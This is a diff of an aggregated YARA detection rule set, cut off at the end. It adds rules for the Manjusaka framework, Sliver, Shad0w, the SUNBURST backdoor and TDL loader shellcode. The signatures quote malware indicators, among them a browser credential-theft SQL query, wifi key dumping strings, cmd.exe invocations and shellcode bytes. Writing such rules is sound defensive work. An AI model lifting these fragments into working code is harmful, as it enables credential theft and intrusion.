-	strings:
-		$s01 = "1f8b08000000000000ff7cdd099c1ae5fd3ff031e620c6038d5aea493df18a24c688372626c1180d468d78d465b34b96357be0ee2612354ab5553caa68ad454d158f2a566b51ab454d2dde"
-		$s02 = "1f8b08000000000000ff94dd09982355d9fffd62d89a45880a181621804240c10888718328a8ed864144a3029d66ba67d2cc4c4fecee8180a85114f3284b4096b00d619380085111f3284a"
-		$s03 = "1f8b08000000000000ff94dd0b982355b5fffde21eee011503a204440d201001317a148278890a1804348ad269667a260d3d33b1bb19820246bc10914bb80811618c80108f084110232204"
-		$s04 = "1f8b08000000000000ff94dd07981bd5d9fffdb131208a41b4075123ba280101c6112d88d04468a22b01b25abc6b6bf17aadecae4140008540103582001110401483e8a28b2e4a4074d197"
-		$s11 = "1f8b08000000000000ffecbd09784cd7ff077c26c924631977828958c284694d5092da12eb8448ce302108a248628ba82d65862025e924b8aeabdaeaa2abb6bfaebad74f83fe4804a1d5d6"
-		$s12 = "1f8b08000000000000ffecbd097414c5faff5d9d7502849e400209201974c4441113371240c8842cd5d00361070502224bdc403203a82c8993d1146d2b7ac5e5ba5cdcb9aea85c36176612"
-		$s13 = "1f8b08000000000000ffecbd7b7854d5d928be7632496620710d4874522e9991ad4e94627641491425031378b7ae1150046a1168a1237ca2419801542e893b53b3d8eeafb4b5777b8eb5fd"
-		$s14 = "1f8b08000000000000ffecbd7b7854d5d530be4f32496620710f9ae8a45c3223479d28d51c414934960c4c601ddd23a811a845a0858e50d120cc002a97c49369b3399e96b6dacb5bfb7dbe"
-		$s15 = "1f8b08000000000000ffecbd79785445d6305eb7934e3a90e676846887451abc68c7b5e33293284b37e924a7e506a222a022c45119501c23744b1c194ce6764b2a97abcc88233a3aaee38a"
-
-	condition:
-		(AVASTTI_EXE_PRIVATE or AVASTTI_ELF_PRIVATE ) and ( any of ( $s0* ) and any of ( $s1* ) )
-}
-rule AVASTTI_Manjusaka_Payload_Elf
-{
-	meta:
-		description = "No description has been set in the source file - AvastTI"
-		author = "Avast Threat Intel Team"
-		id = "010398f6-ca9b-58b4-a9d8-12428f649ffc"
-		date = "2022-10-05"
-		modified = "2022-10-05"
-		reference = "https://github.com/avast/ioc"
-		source_url = "https://github.com/avast/ioc/blob/5659f4f0f4e09970c5de29c536ceb500d5634951/Manjusaka/Manjusaka.yar#L95-L122"
-		license_url = "N/A"
-		hash = "0063e5007566e0a7e8bfd73c4628c6d140b332df4f9afbb0adcf0c832dd54c2b"
-		hash = "76eb9af0e2f620016d63d38ddb86f0f3f8f598b54146ad14e6af3d8f347dd365"
-		hash = "0a5174b5181fcd6827d9c4a83e9f0423838cbb5a6b23d012c3ae414b31c8b0da"
-		hash = "63e7f6fa89faa88b346d0cceddf2ef2e3ebf5d5828aa0087663c227422041db7"
-		hash = "400855b63b8452221869630c58b7ab03373dabf77c0f10df635e746c13f98ea9"
-		hash = "4eb337c12f0e0ee73b3209bed4b819719c4af9f63f3e81dbc3bbf06212450f1c"
-		logic_hash = "bbc496788381b57b3ea2814dd61a824d552233f9c5f73287f8bc284252fbedfe"
-		score = 75
-		quality = 90
-		tags = ""
-
-	strings:
-		$s01 = "proc/meminfo/proc/uptime/etc/os-releaseVERSION_ID=NAME=DISTRIB_ID"
-		$s02 = "/root/.cargo/registry/src/mirrors.ustc.edu.cn"
-		$s03 = "cmdlineexecwdassertion failed"
-		$s04 = "/etc/passwd/root/"
-		$s11 = "./protos/cs.rstargetpidAgentsagentAgentUpdatesleepenckeysysinfoConfigPluginExecPluginLoadReqCwd"
-		$s12 = "ReqScreenH"
-		$s13 = "manjusakahttp:"
-		$s14 = "pluginexecpluginloadreqcwdreqcmd"
-		$s15 = "/NPSC2/npc/libs/"
-
-	condition:
-		AVASTTI_ELF_PRIVATE and ( all of ( $s0* ) and any of ( $s1* ) )
-}
-rule AVASTTI_Manjusaka_Payload_Mz
-{
-	meta:
-		description = "No description has been set in the source file - AvastTI"
-		author = "Avast Threat Intel Team"
-		id = "808fe840-27e2-5361-b97a-4b04e6d8f7da"
-		date = "2022-10-05"
-		modified = "2022-10-05"
-		reference = "https://github.com/avast/ioc"
-		source_url = "https://github.com/avast/ioc/blob/5659f4f0f4e09970c5de29c536ceb500d5634951/Manjusaka/Manjusaka.yar#L124-L161"
-		license_url = "N/A"
-		hash = "6839180bc3a2404e629c108d7e8c8548caf9f8249bbbf658b47c00a15a64758f"
-		hash = "cd0c75638724c0529cc9e7ca0a91d2f5d7221ef2a87b65ded2bc1603736e3b5d"
-		hash = "d5918611b1837308d0c6d19bff4b81b00d4f6a30c1240c00a9e0a9b08dde1412"
-		hash = "2b174d417a4e43fd6759c64512faa88f4504e8f14f08fd5348fff51058c9958f"
-		hash = "377bacba69d2bec770599ab21a202b574b92fb431fc35bbdf39080025d6cf2d6"
-		hash = "86c633467ba7981d3946a63184dbfabce587b571f761b3eb1e3e43f6b1df6f2c"
-		hash = "51857882d1202e72c0cf18ff21de773c2a31ee68ff28385f968478401c5ab4bb"
-		hash = "e07aa10f19574a856a4ac389a3ded96f2d78f41f939935dd678811bd12b5bd03"
-		hash = "9e7144540430d97de38a2adcef16ad43e23c91281462b135fcc56cafc2f34160"
-		logic_hash = "81b01eff8384707ce67f6d888e59e690d7fb7b4e32359043ced9230499813aa7"
-		score = 60
-		quality = 50
-		tags = ""
-
-	strings:
-		$s01 = ".\\protos\\cs.rstargetintranethostnameplatformpidAgentsstatusagentinternetupdateatAgentUpdate"
-		$s02 = "PluginExecPluginLoadReqCwdcmdReqCmd"
-		$s03 = "Users\\Administrator.WIN7-2021OVWRCZ\\.cargo"
-		$s04 = "Users\\runneradmin\\.cargo"
-		$s05 = "windows\\c.rsNtReadFile"
-		$s11 = "src\\mirrors.ustc.edu.cn-"
-		$s12 = "CodeProject\\hw_src\\NPSC2\\npc\\target\\release\\deps\\npc.pdb"
-		$s13 = "@@@manjusaka"
-		$s14 = "***manjusakahttp://"
-		$s15 = "SELECT signon_realm, username_value, password_value FROM loginsnetshwlanshowprofile"
-		$s16 = "name=key=clearWIFI"
-		$s17 = "cmd.exe/c"
-		$s18 = "Accept-Languagezh-CN,zh;q=0.9,en;q=0.8Accept-Encodinggzip"
-		$s19 = "library\\std\\src\\sys_common\\wtf8.rs"
-		$s110 = "plug_getpass_nps.dll"
-		$s111 = "plug_test_nps.dll"
-
-	condition:
-		AVASTTI_EXE_PRIVATE and ( 2 of ( $s0* ) or 3 of ( $s1* ) )
-}
 rule AVASTTI_Cobaltstrike_Raw_Payload_Dns_Stager_X86
 {
 	meta:
@@ -164786,11 +165217,170 @@ rule AVASTTI_Cobaltstrike_Beacon_Xored_X64
 	condition:
 		$h01 and ( uint32be( @h11 + 12 ) ^ uint32be( @h11 + 20 ) == 0x4D5A4152 or uint32be( @h11 + 12 ) ^ uint32be( @h11 + 20 ) == 0x904D5A41 or uint32be( @h11 + 12 ) ^ uint32be( @h11 + 20 ) == 0x90904D5A or uint32be( @h11 + 12 ) ^ uint32be( @h11 + 20 ) == 0x9090904D or uint32be( @h11 + 12 ) ^ uint32be( @h11 + 20 ) == 0x90909090 )
 }
+rule AVASTTI_Manjusaka_Framework_Go_Build_Id
+{
+	meta:
+		description = "No description has been set in the source file - AvastTI"
+		author = "Avast Threat Intel Team"
+		id = "eca3324c-c029-53b5-b33d-9ec758dcd863"
+		date = "2022-10-05"
+		modified = "2022-10-05"
+		reference = "https://github.com/avast/ioc"
+		source_url = "https://github.com/avast/ioc/blob/5659f4f0f4e09970c5de29c536ceb500d5634951/Manjusaka/Manjusaka.yar#L15-L62"
+		license_url = "N/A"
+		hash = "955e9bbcdf1cb230c5f079a08995f510a3b96224545e04c1b1f9889d57dd33c1"
+		hash = "f275ca5129399a521c8cd9754b1133ecd2debcfafc928c01df6bd438522c564a"
+		hash = "637f3080526d7d0ad5eb41bf9331fb51aaafd30f2895c00a44ad905154f76d70"
+		hash = "b5c366d782426bad4ba880dc908669ff785420dea02067b12e2261dd1988f34a"
+		hash = "107b094031094cbb1f081d85ec2799c3450dce32e254bda2fd1bb32edb449aa4"
+		hash = "fb5835f42d5611804aaa044150a20b13dcf595d91314ebef8cf6810407d85c64"
+		hash = "ff20333d38f7affbfde5b85d704ee20cd60b519cb57c70e0cf5ac1f65acf91a6"
+		hash = "3581d99feb874f65f53866751b7874c106b5ce65a523972ef6a736844209043c"
+		hash = "6082bf26bcc07bf299a88eaa0272022418b12156cd987adfdff9fa1517afcf3d"
+		hash = "14dfb43a1782b0b8d93c3d67d63b6c786b0a223bc50c3ec68106bd18d43652a4"
+		hash = "4a0f47132867c12a6d009e43812729a1bb41f4eb83472ac352fc5b20fe937bef"
+		hash = "bb1b7d506559c783ed747da461f58ea5256ba0a083768ae6aa1a2325017c4387"
+		hash = "bd0e09e9ee4db74ada6433f00024a543f799046c15f635216ca4ae5e1f0c42e2"
+		logic_hash = "de68bc483255c9c1095771925a7c2fc3062489a4468d42e7c6aa9f0146841c5c"
+		score = 75
+		quality = 88
+		tags = ""
+
+	strings:
+		$h01 = { 47 6F 00 00 57 79 5F 76 69 62 44 5A 76 32 77 6D 35 62 4C 32 71 73 6A 4A 2F 34 50 4D 56 79 4D 39 39 76 61 76 58 68 7A 65 5A 34 6C 76 2D 2F 4E 59 6C 5F 4B 6D 75 53 45 62 53 4E 4A 6B 39 45 61 52 74 31 2F 2D 45 4D 50 57 64 6A 73 30 4E 6C 37 73 79 67 41 41 74 65 54 00 }
+		$h02 = { 47 6F 00 00 79 30 4D 57 35 6A 74 30 45 6B 61 77 55 4B 35 6B 6B 6C 31 32 2F 5A 68 34 34 36 61 65 4D 7A 62 48 47 37 4F 73 56 4F 66 71 75 2F 6D 5F 58 74 43 52 32 32 39 75 4B 67 5A 62 51 65 44 35 43 74 2F 66 78 66 47 4A 47 61 59 4E 31 5F 36 6E 4E 76 32 58 5A 53 62 00 }
+		$h03 = { 47 6F 06 FF FF FF 7F 79 30 4D 57 35 6A 74 30 45 6B 61 77 55 4B 35 6B 6B 6C 31 32 2F 5A 68 34 34 36 61 65 4D 7A 62 FF FF FF FF 48 47 37 4F 73 56 4F 66 71 75 2F 6D 5F 58 74 43 52 32 32 39 75 4B 67 5A 62 51 65 44 35 43 74 2F }
+		$h04 = { 47 6F 00 00 30 33 30 36 42 53 4B 42 71 6E 71 4B 74 4D 51 71 67 53 58 4D 2F 68 4C 6A 34 77 76 56 56 4A 4C 79 42 43 61 4A 42 5F 38 4D 30 2F 73 74 66 62 47 73 46 5A 58 67 4E 6B 50 77 5A 4B 4C 71 52 65 2F 4D 49 46 68 69 67 7A 65 50 53 65 56 35 64 5F 52 6D 66 43 35 00 }
+		$h05 = { 47 6F 06 FF FF FF 7F 30 33 30 36 42 53 4B 42 71 6E 71 4B 74 4D 51 71 67 53 58 4D 2F 68 4C 6A 34 77 76 56 56 4A 4C FF FF FF FF 79 42 43 61 4A 42 5F 38 4D 30 2F 73 74 66 62 47 73 46 5A 58 67 4E 6B 50 77 5A 4B 4C 71 52 65 }
+		$h06 = { 47 6F 00 00 36 35 34 67 69 6A 50 41 55 6B 45 61 7A 4A 70 6A 44 39 4E 55 2F 67 44 75 48 46 31 78 66 64 70 39 31 53 66 36 53 59 51 48 58 2F 76 73 6E 6E 37 65 6B 67 30 54 4B 58 57 69 4F 53 63 46 30 44 2F 53 61 6D 30 73 51 6D 66 79 43 61 44 43 38 71 43 66 59 78 35 00 }
+		$h07 = { 47 6F 06 FF ED FF 7F 36 35 34 67 69 6A 50 41 55 6B 45 61 7A 4A 70 6A 44 39 68 2F 67 44 75 48 46 31 78 66 FF FF FF FF 64 70 39 31 53 66 36 53 59 51 48 58 2F 76 73 6E 6E 37 65 6B 67 30 54 4B 58 57 69 4F 53 63 46 30 }
+		$h08 = { 47 6F 20 62 FF FF FF FF 75 69 6C 64 20 49 44 3A 20 22 65 72 52 47 4F 4A 56 48 65 38 37 58 67 6D 79 4F 56 77 48 44 2F 42 FB FF FF FF 70 78 56 76 70 79 44 58 74 4C 64 64 79 57 46 64 38 4E 39 2F 6F 59 77 64 70 73 6D 46 45 }
+		$h09 = { 47 6F 20 62 75 69 6C 64 20 49 44 3A 20 22 65 72 52 47 4F 4A 56 48 65 38 37 58 67 6D 79 4F 56 77 48 44 2F 42 70 78 56 76 70 79 44 58 74 4C 64 64 79 57 46 64 38 4E 39 2F 6F 59 77 64 70 73 6D 46 45 44 58 39 32 58 4A 55 52 4C 55 7A 2F 62 62 58 59 38 43 76 6B 44 4D 72 69 42 33 32 64 49 36 53 58 }
+		$h10 = { 47 6F 00 00 47 6E 42 4B 6F 63 4C 77 76 57 5A 6E 43 5F 55 6D 49 72 2D 72 2F 36 50 2D 4F 7A 46 62 51 37 39 6F 59 79 79 61 44 52 48 56 34 2F 38 74 6D 46 77 78 63 53 64 63 63 6D 70 66 73 5A 63 33 68 62 2F 77 34 2D 36 49 52 50 70 75 42 66 75 61 68 7A 50 63 4C 35 32 00 }
+		$h11 = { 47 6F 06 FF FF FF FF 6E 42 4B 6F 63 4C 77 76 57 5A 6E 43 5F 55 6D 49 72 2D 72 2F 36 50 2D 4F 7A 46 62 51 37 39 6F FF FF 6F FF 59 79 79 61 44 52 48 56 DC 38 74 6D 46 77 78 63 53 64 63 63 6D 70 66 73 5A 63 33 68 62 }
+		$h12 = { 47 6F 00 00 4E 50 57 41 64 50 62 57 6D 6E 58 72 30 61 36 67 44 37 4B 7A 2F 54 74 6E 59 64 4F 79 43 6A 76 63 43 51 75 5A 39 47 69 44 72 2F 46 43 6D 4F 69 38 41 30 36 36 52 50 43 36 53 4F 57 76 61 4D 2F 43 70 57 37 4F 30 73 38 61 51 32 42 46 56 64 66 65 62 54 4A 00 }
+		$h13 = { 47 6F 06 FF FF FF 7F 4E 50 57 41 64 50 62 57 6D 6E 58 72 30 61 36 67 44 37 4B 7A 2F 54 74 6E 59 64 4F 79 43 6A 76 FF FF FF FF 63 43 51 75 5A 39 47 69 44 72 2F 46 43 6D 4F 69 38 41 30 36 36 52 50 43 36 53 4F 57 76 61 4D 2F }
+
+	condition:
+		any of them
+}
+rule AVASTTI_Manjusaka_Payload_Encoded_Hexstring
+{
+	meta:
+		description = "No description has been set in the source file - AvastTI"
+		author = "Avast Threat Intel Team"
+		id = "9799081c-67ec-5ab8-9b23-31f60c05fc05"
+		date = "2022-10-05"
+		modified = "2022-10-05"
+		reference = "https://github.com/avast/ioc"
+		source_url = "https://github.com/avast/ioc/blob/5659f4f0f4e09970c5de29c536ceb500d5634951/Manjusaka/Manjusaka.yar#L64-L93"
+		license_url = "N/A"
+		logic_hash = "5c0b83e709baea7db6185d888bfa10bab073eb0eb2f3fb72df2da76fff3f6f22"
+		score = 75
+		quality = 90
+		tags = ""
+
+	strings:
+		$s01 = "1f8b08000000000000ff7cdd099c1ae5fd3ff031e620c6038d5aea493df18a24c688372626c1180d468d78d465b34b96357be0ee2612354ab5553caa68ad454d158f2a566b51ab454d2dde"
+		$s02 = "1f8b08000000000000ff94dd09982355d9fffd62d89a45880a181621804240c10888718328a8ed864144a3029d66ba67d2cc4c4fecee8180a85114f3284b4096b00d619380085111f3284a"
+		$s03 = "1f8b08000000000000ff94dd0b982355b5fffde21eee011503a204440d201001317a148278890a1804348ad269667a260d3d33b1bb19820246bc10914bb80811618c80108f084110232204"
+		$s04 = "1f8b08000000000000ff94dd07981bd5d9fffdb131208a41b4075123ba280101c6112d88d04468a22b01b25abc6b6bf17aadecae4140008540103582001110401483e8a28b2e4a4074d197"
+		$s11 = "1f8b08000000000000ffecbd09784cd7ff077c26c924631977828958c284694d5092da12eb8448ce302108a248628ba82d65862025e924b8aeabdaeaa2abb6bfaebad74f83fe4804a1d5d6"
+		$s12 = "1f8b08000000000000ffecbd097414c5faff5d9d7502849e400209201974c4441113371240c8842cd5d00361070502224bdc403203a82c8993d1146d2b7ac5e5ba5cdcb9aea85c36176612"
+		$s13 = "1f8b08000000000000ffecbd7b7854d5d928be7632496620710d4874522e9991ad4e94627641491425031378b7ae1150046a1168a1237ca2419801542e893b53b3d8eeafb4b5777b8eb5fd"
+		$s14 = "1f8b08000000000000ffecbd7b7854d5d530be4f32496620710f9ae8a45c3223479d28d51c414934960c4c601ddd23a811a845a0858e50d120cc002a97c49369b3399e96b6dacb5bfb7dbe"
+		$s15 = "1f8b08000000000000ffecbd79785445d6305eb7934e3a90e676846887451abc68c7b5e33293284b37e924a7e506a222a022c45119501c23744b1c194ce6764b2a97abcc88233a3aaee38a"
+
+	condition:
+		(AVASTTI_EXE_PRIVATE or AVASTTI_ELF_PRIVATE ) and ( any of ( $s0* ) and any of ( $s1* ) )
+}
+rule AVASTTI_Manjusaka_Payload_Elf
+{
+	meta:
+		description = "No description has been set in the source file - AvastTI"
+		author = "Avast Threat Intel Team"
+		id = "010398f6-ca9b-58b4-a9d8-12428f649ffc"
+		date = "2022-10-05"
+		modified = "2022-10-05"
+		reference = "https://github.com/avast/ioc"
+		source_url = "https://github.com/avast/ioc/blob/5659f4f0f4e09970c5de29c536ceb500d5634951/Manjusaka/Manjusaka.yar#L95-L122"
+		license_url = "N/A"
+		hash = "0063e5007566e0a7e8bfd73c4628c6d140b332df4f9afbb0adcf0c832dd54c2b"
+		hash = "76eb9af0e2f620016d63d38ddb86f0f3f8f598b54146ad14e6af3d8f347dd365"
+		hash = "0a5174b5181fcd6827d9c4a83e9f0423838cbb5a6b23d012c3ae414b31c8b0da"
+		hash = "63e7f6fa89faa88b346d0cceddf2ef2e3ebf5d5828aa0087663c227422041db7"
+		hash = "400855b63b8452221869630c58b7ab03373dabf77c0f10df635e746c13f98ea9"
+		hash = "4eb337c12f0e0ee73b3209bed4b819719c4af9f63f3e81dbc3bbf06212450f1c"
+		logic_hash = "bbc496788381b57b3ea2814dd61a824d552233f9c5f73287f8bc284252fbedfe"
+		score = 75
+		quality = 90
+		tags = ""
+
+	strings:
+		$s01 = "proc/meminfo/proc/uptime/etc/os-releaseVERSION_ID=NAME=DISTRIB_ID"
+		$s02 = "/root/.cargo/registry/src/mirrors.ustc.edu.cn"
+		$s03 = "cmdlineexecwdassertion failed"
+		$s04 = "/etc/passwd/root/"
+		$s11 = "./protos/cs.rstargetpidAgentsagentAgentUpdatesleepenckeysysinfoConfigPluginExecPluginLoadReqCwd"
+		$s12 = "ReqScreenH"
+		$s13 = "manjusakahttp:"
+		$s14 = "pluginexecpluginloadreqcwdreqcmd"
+		$s15 = "/NPSC2/npc/libs/"
+
+	condition:
+		AVASTTI_ELF_PRIVATE and ( all of ( $s0* ) and any of ( $s1* ) )
+}
+rule AVASTTI_Manjusaka_Payload_Mz
+{
+	meta:
+		description = "No description has been set in the source file - AvastTI"
+		author = "Avast Threat Intel Team"
+		id = "808fe840-27e2-5361-b97a-4b04e6d8f7da"
+		date = "2022-10-05"
+		modified = "2022-10-05"
+		reference = "https://github.com/avast/ioc"
+		source_url = "https://github.com/avast/ioc/blob/5659f4f0f4e09970c5de29c536ceb500d5634951/Manjusaka/Manjusaka.yar#L124-L161"
+		license_url = "N/A"
+		hash = "6839180bc3a2404e629c108d7e8c8548caf9f8249bbbf658b47c00a15a64758f"
+		hash = "cd0c75638724c0529cc9e7ca0a91d2f5d7221ef2a87b65ded2bc1603736e3b5d"
+		hash = "d5918611b1837308d0c6d19bff4b81b00d4f6a30c1240c00a9e0a9b08dde1412"
+		hash = "2b174d417a4e43fd6759c64512faa88f4504e8f14f08fd5348fff51058c9958f"
+		hash = "377bacba69d2bec770599ab21a202b574b92fb431fc35bbdf39080025d6cf2d6"
+		hash = "86c633467ba7981d3946a63184dbfabce587b571f761b3eb1e3e43f6b1df6f2c"
+		hash = "51857882d1202e72c0cf18ff21de773c2a31ee68ff28385f968478401c5ab4bb"
+		hash = "e07aa10f19574a856a4ac389a3ded96f2d78f41f939935dd678811bd12b5bd03"
+		hash = "9e7144540430d97de38a2adcef16ad43e23c91281462b135fcc56cafc2f34160"
+		logic_hash = "81b01eff8384707ce67f6d888e59e690d7fb7b4e32359043ced9230499813aa7"
+		score = 60
+		quality = 50
+		tags = ""
+
+	strings:
+		$s01 = ".\\protos\\cs.rstargetintranethostnameplatformpidAgentsstatusagentinternetupdateatAgentUpdate"
+		$s02 = "PluginExecPluginLoadReqCwdcmdReqCmd"
+		$s03 = "Users\\Administrator.WIN7-2021OVWRCZ\\.cargo"
+		$s04 = "Users\\runneradmin\\.cargo"
+		$s05 = "windows\\c.rsNtReadFile"
+		$s11 = "src\\mirrors.ustc.edu.cn-"
+		$s12 = "CodeProject\\hw_src\\NPSC2\\npc\\target\\release\\deps\\npc.pdb"
+		$s13 = "@@@manjusaka"
+		$s14 = "***manjusakahttp://"
+		$s15 = "SELECT signon_realm, username_value, password_value FROM loginsnetshwlanshowprofile"
+		$s16 = "name=key=clearWIFI"
+		$s17 = "cmd.exe/c"
+		$s18 = "Accept-Languagezh-CN,zh;q=0.9,en;q=0.8Accept-Encodinggzip"
+		$s19 = "library\\std\\src\\sys_common\\wtf8.rs"
+		$s110 = "plug_getpass_nps.dll"
+		$s111 = "plug_test_nps.dll"
+
+	condition:
+		AVASTTI_EXE_PRIVATE and ( 2 of ( $s0* ) or 3 of ( $s1* ) )
+}
 /*
  * YARA Rule Set
  * Repository Name: SBousseaden
  * Repository: https://github.com/sbousseaden/YaraHunts/
- * Retrieval Date: 2025-06-08
+ * Retrieval Date: 2025-06-15
  * Git Commit: 71b27a2a7c57c2aa1877a11d8933167794e2b4fb
  * Number of Rules: 37
  * Skipped: 0 (age), 4 (quality), 0 (score), 0 (importance)
@@ -164800,6 +165390,207 @@ rule AVASTTI_Cobaltstrike_Beacon_Xored_X64
  *
  * NO LICENSE SET
  */
+
+rule SBOUSSEADEN_Gosliver
+{
+	meta:
+		description = "No description has been set in the source file - SBousseaden"
+		author = "SBousseaden"
+		id = "eba5043a-ca4d-5c5d-a895-51218b03e59e"
+		date = "2020-10-11"
+		modified = "2020-10-11"
+		reference = "https://github.com/BishopFox/sliver"
+		source_url = "https://github.com/sbousseaden/YaraHunts//blob/71b27a2a7c57c2aa1877a11d8933167794e2b4fb/hunt_sliver_go_framwwork.yara#L2-L9"
+		license_url = "N/A"
+		logic_hash = "8dc96e533adc29c78a998d9f064ff294d2ef8a4ff00cef8b0c81ef465ef70b08"
+		score = 75
+		quality = 75
+		tags = ""
+
+	strings:
+		$go = "_cgo_"
+
+	condition:
+		#go> 10 and pe.exports ( "RunSliver" )
+}
+rule SBOUSSEADEN_Hunt_Susp_Vhd : FILE
+{
+	meta:
+		description = "Virtual hard disk file with embedded PE"
+		author = "SBousseaden"
+		id = "14b082b2-c5cd-5f34-85e9-5987650eaacd"
+		date = "2020-07-13"
+		modified = "2020-07-13"
+		reference = "https://github.com/sbousseaden/YaraHunts/"
+		source_url = "https://github.com/sbousseaden/YaraHunts//blob/71b27a2a7c57c2aa1877a11d8933167794e2b4fb/hunt_susp_vhd.yara#L1-L12"
+		license_url = "N/A"
+		logic_hash = "4ba2e3f533942b27c1d235be4677afdac774b558429c414043a8e3a609123ad3"
+		score = 65
+		quality = 73
+		tags = "FILE"
+
+	strings:
+		$hvhd = {636F6E6563746978}
+		$s1 = {4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00}
+		$s2 = "!This program cannot be run in DOS mode." base64
+		$s3 = "!This program cannot be run in DOS mode." xor
+
+	condition:
+		$hvhd at 0 and any of ( $s* ) and filesize <= 10MB
+}
+
+rule SBOUSSEADEN_Shad0W_Beacon : FILE
+{
+	meta:
+		description = "Shad0w beacon default suspicous strings"
+		author = "SBousseaden"
+		id = "e725172d-dd07-5027-ac85-86d366881856"
+		date = "2020-06-04"
+		modified = "2020-06-05"
+		reference = "https://github.com/bats3c/shad0w"
+		source_url = "https://github.com/sbousseaden/YaraHunts//blob/71b27a2a7c57c2aa1877a11d8933167794e2b4fb/shad0w.yara#L3-L15"
+		license_url = "N/A"
+		logic_hash = "9ea7cf72da0d93f607f58b61cc0fb5f3f114d4454101c69b08c59e6b61353550"
+		score = 75
+		quality = 73
+		tags = "FILE"
+
+	strings:
+		$s1 = "LdrLoadD"
+		$s2 = {53 65 74 50 72 2A 65 73 73 4D}
+		$s3 = "Policy"
+
+	condition:
+		uint16( 0 ) == 0x5a4d and all of ( $s* ) and pe.sections [ 0 ] . name == "XPU0" and pe.imports ( "winhttp.dll" , "WinHttpOpen" )
+}
+rule SBOUSSEADEN_APT_Solarwind_Backdoor_Encoded_Strings : FILE
+{
+	meta:
+		description = "This rule is looking for some key encoded strings of the SUNBURST backdoor"
+		author = "SBousseaden"
+		id = "04a63bd6-9737-568f-a20e-c573b915cbd4"
+		date = "2020-12-14"
+		modified = "2020-12-18"
+		reference = "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html"
+		source_url = "https://github.com/sbousseaden/YaraHunts//blob/71b27a2a7c57c2aa1877a11d8933167794e2b4fb/apt_solarwinds_backdoor_encoded_strings.yara#L1-L28"
+		license_url = "N/A"
+		hash = "846e27a652a5e1bfbd0ddd38a16dc865"
+		logic_hash = "8808cca8d89f089a8bca5ef62c1764061c8210ba5f9813c886d6ed9f79579ba6"
+		score = 75
+		quality = 75
+		tags = "FILE"
+		sha2 = "ce77d116a074dab7a22a0fd4f2c1ab475f16eec42e1ded3c0b0aa8211fe858d6"
+
+	strings:
+		$sw = "SolarWinds"
+		$priv1 = "C04NScxO9S/PSy0qzsgsCCjKLMvMSU1PBQA=" wide
+		$priv2 = "C04NzigtSckvzwsoyizLzElNTwUA" wide
+		$priv3 = "C04NSi0uyS9KDSjKLMvMSU1PBQA=" wide
+		$disc1 = "C0gsSs0rCSjKT04tLvZ0AQA=" wide
+		$disc2 = "c0zJzczLLC4pSizJLwIA" wide
+		$disc3 = "c/ELdsnPTczMCy5NS8usCE5NLErO8C9KSS0CAA==" wide
+		$wmi1 = "C07NSU0uUdBScCvKz1UIz8wzNooPriwuSc11KcosSy0CAA==" wide
+		$wmi2 = "C07NSU0uUdBScCvKz1UIz8wzNooPKMpPTi0uBgA=" wide
+		$wmi3 = "C07NSU0uUdBScCvKz1UIz8wzNooPLU4tckxOzi/NKwEA" wide
+		$wmi4 = "C07NSU0uUdBScCvKz1UIz8wzNor3Sy0pzy/KdkxJLChJLXLOz0vLTC8tSizJzM9TKM9ILUpV8AxwzUtMyklNsS0pKk0FAA=="
+		$key1 = "C44MDnH1jXEuLSpKzStxzs8rKcrPCU4tiSlOLSrLTE4tBgA=" wide
+		$key2 = "Cy5JLCoBAA==" wide
+		$pat1 = "i6420DGtjVWoNqzlAgA=" wide
+		$pat2 = "i6420DGtjVWoNtTRNTSrVag2quWsNgYKKVSb1MZUm9ZyAQA=" wide
+		$pat3 = "qzaoVag2rFXwCAkJ0K82quUCAA==" wide
+		$pat4 = {9D 2A 9A F3 27 D6 F8 EF}
+
+	condition:
+		uint16( 0 ) == 0x5a4d and $sw and ( 2 of ( $pat* ) or 2 of ( $priv* ) or all of ( $disc* ) or 2 of ( $wmi* ) or all of ( $key* ) )
+}
+
+rule SBOUSSEADEN_Susp_Winsvc_Upx : FILE
+{
+	meta:
+		description = "broad hunt for any PE exporting ServiceMain API and upx packed"
+		author = "SBousseaden"
+		id = "883691fe-3858-5177-97ca-122ff2ec54af"
+		date = "2019-01-28"
+		modified = "2020-06-05"
+		reference = "https://github.com/sbousseaden/YaraHunts/"
+		source_url = "https://github.com/sbousseaden/YaraHunts//blob/71b27a2a7c57c2aa1877a11d8933167794e2b4fb/susp_winsvc_upx.yara#L3-L13"
+		license_url = "N/A"
+		logic_hash = "85b1932eaab4e559f0805aa76ad9b58553708391b3ac894a8e4f1cf34470dcb7"
+		score = 65
+		quality = 75
+		tags = "FILE"
+
+	strings:
+		$upx1 = {55505830000000}
+		$upx2 = {55505831000000}
+		$upx_sig = "UPX!"
+
+	condition:
+		uint16( 0 ) == 0x5a4d and $upx1 in ( 0 .. 1024 ) and $upx2 in ( 0 .. 1024 ) and $upx_sig in ( 0 .. 1024 ) and pe.exports ( "ServiceMain" )
+}
+rule SBOUSSEADEN_TDL_Loader_Bootstrap_Shellcode : FILE
+{
+	meta:
+		description = "No description has been set in the source file - SBousseaden"
+		author = "SBousseaden"
+		id = "a2adedef-ba38-599f-b52c-e2156aa5ef98"
+		date = "2020-10-10"
+		modified = "2020-10-10"
+		reference = "https://github.com/hfiref0x/TDL"
+		source_url = "https://github.com/sbousseaden/YaraHunts//blob/71b27a2a7c57c2aa1877a11d8933167794e2b4fb/tdl_loader_bootstrat_shellcode.yara#L1-L9"
+		license_url = "N/A"
+		logic_hash = "14a993b415e330e284503c409ab66445c5e369a21ef0be37297d9c8946b5559b"
+		score = 75
+		quality = 75
+		tags = "FILE"
+
+	strings:
+		$shc1 = {41 B8 54 64 6C 53 48 63 6B 3C 48 03 EB 44 8B 7D 50 41 8D 97 00 10 00 00 41 FF D1}
+		$shc2 = {41 B8 54 64 6C 53 4C 63 73 3C 4C 03 F3 45 8B 7E 50 41 8D 97 00 10 00 00 41 FF D1 45 33 C9}
+
+	condition:
+		uint16( 0 ) == 0x5a4d and any of ( $shc* )
+}
+
+rule SBOUSSEADEN_Susp_Msoffice_Addins_Wxll : FILE
+{
+	meta:
+		description = "hunt for suspicious MS Office Addins with code injection capabilities"
+		author = "SBousseaden"
+		id = "39d3b2af-f848-51c0-a13b-13c0fe3a79dd"
+		date = "2020-11-10"
+		modified = "2023-03-27"
+		reference = "https://twitter.com/JohnLaTwC/status/1315287078855352326"
+		source_url = "https://github.com/sbousseaden/YaraHunts//blob/71b27a2a7c57c2aa1877a11d8933167794e2b4fb/hunt_susp_msoffice_addins_wxll.yara#L3-L29"
+		license_url = "N/A"
